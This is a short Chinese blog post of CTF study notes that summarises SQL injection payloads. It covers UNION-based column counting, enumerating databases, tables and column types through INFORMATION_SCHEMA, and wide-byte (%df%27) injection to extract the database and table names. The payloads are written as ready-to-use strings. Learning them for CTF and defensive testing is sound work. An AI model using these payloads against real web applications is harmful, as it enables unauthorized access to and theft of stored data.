何止.

ctf

arp(2) C++(9) C/C++(8) Cmd命令(1) ctf-web(2) CTF:web(5) CTF学习整理(19) git(1) HTTP(3) HTTP&WEB(1) Idea(1) IDEA美化(1) JAVA(37) JSP(1) LeetCode(1) Mysql(17) Php(4) PTA(7) python(8) reverse(4) RSA(1) ssm(2) Tomcat(4) Tomcat&Web(1) vscode(1) 图(1) 字节、字符、编码方案(1) 异或运算(1) 我自己写1!1!!!!!!的没有任何版权问题(1) 数据结构(2) 新建的(1) 日常(2) 未归档(12) 爬虫(2) 算法目录(1) 线程(2) 网络安全(6) 闲扯(2)

归档

标签

去牛客网

/ 注册

sql注入语句简单总结

514 浏览 0 回复 2020-01-23

何止.

+关注

0 'union select 1,2,3……………… # 到几时失败的前一个就是列数，比如1，2，3，4时不报错,加个5报错那么说明有4列

' and 0 union select 1,TABLE_SCHEMA,TABLE_NAME from INFORMATION_SCHEMA.COLUMNS #爆数据库名，表名

获取news 表的字段名，数据类型:

' and 0 union select 1,column_name,data_type from information_schema.columns where table_name='news'# news是表名

宽字节注入:

爆库名： id=%df%27 and 1=2 union select 2,database()%23

爆表名：

id=%df%27 and 1=2 union select 2,group_concat(table_name) from information_schema.tables where table_schema=database()%23

评论加载中...